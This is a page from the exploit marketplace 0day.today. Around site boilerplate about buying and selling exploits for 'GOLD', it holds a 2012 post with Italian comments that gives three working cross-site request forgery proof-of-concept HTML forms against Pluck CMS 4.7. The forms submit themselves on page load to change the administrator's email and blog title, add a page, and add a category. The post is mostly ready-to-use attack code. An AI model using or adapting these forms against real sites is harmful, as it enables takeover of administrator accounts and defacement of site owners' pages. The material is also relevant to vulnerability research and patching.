0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pluck cms v4.7 CSRF Vulnerability
# Exploit Title: Pluck cms multiple vulnerabilità # Date: 09/01/2012 # Author: Gordon Security # Vendor or Software Link: www.pluck-cms.org # Version: 4.7 # Category: webapps # Website:www.gordon-security.blogspot.com C.S.R.F. #1 #Grazie a questo P.o.c. possiamo cambiare far cambiare l'e-mail dell'Administrator e il titolo del blog <html> <title>Gordon Security</title> <body onload="javascript:document.forms[0].submit()"> <H3>www.gordon-security.blogspot.com</H3> <H2>CSRF Exploit to change Admin E-mail and Blog Title</H2> <form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=settings"> <input type="hidden" name="cont1" value="Gordon Security"/> <input type="hidden" name="cont2" value="gordon_@hotmail.it"/> <input type="hidden" name="save" value="Salva"/> </form> </body> </html> C.S.R.F. #2 #Tramite questo p.o.c. noi possiamo aggiungere pagine al blog <html> <title>Gordon Security</title> <body onload="javascript:document.forms[0].submit()"> <H3>www.gordon-security.blogspot.com</H3> <H2>CSRF Exploit to add page</H2> <form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?action=editpage"> <input type="hidden" name="title" value="Exploit"/> <input type="hidden" name="content" value="<p>Exploited</p>"/> <input type="hidden" name="description" value=""/> <input type="hidden" name="keywords" value=""/> <input type="hidden" name="hidden" value="no"/> <input type="hidden" name="sub_page" value=""/> <input type="hidden" name="theme" value="default"/> <input type="hidden" name="save_exit" value="Save and Exit"/> </form> </body> </html> C.S.R.F #3 #Con questo p.o.c. noi possiamo aggiungere categorie al blog <html> <title>Gordon Security</title> <body onload="javascript:document.forms[0].submit()"> <H3>www.gordon-security.blogspot.com</H3> <H2>CSRF Exploit to add categorie</H2> <form method="POST" name="form0" action="http://127.0.0.1:80/pluck/admin.php?module=blog"> <input type="hidden" name="cont1" value="Hacking"/> <input type="hidden" name="Submit" value="Salva"/> </form> </body> </html> # 0day.today [2024-11-15] #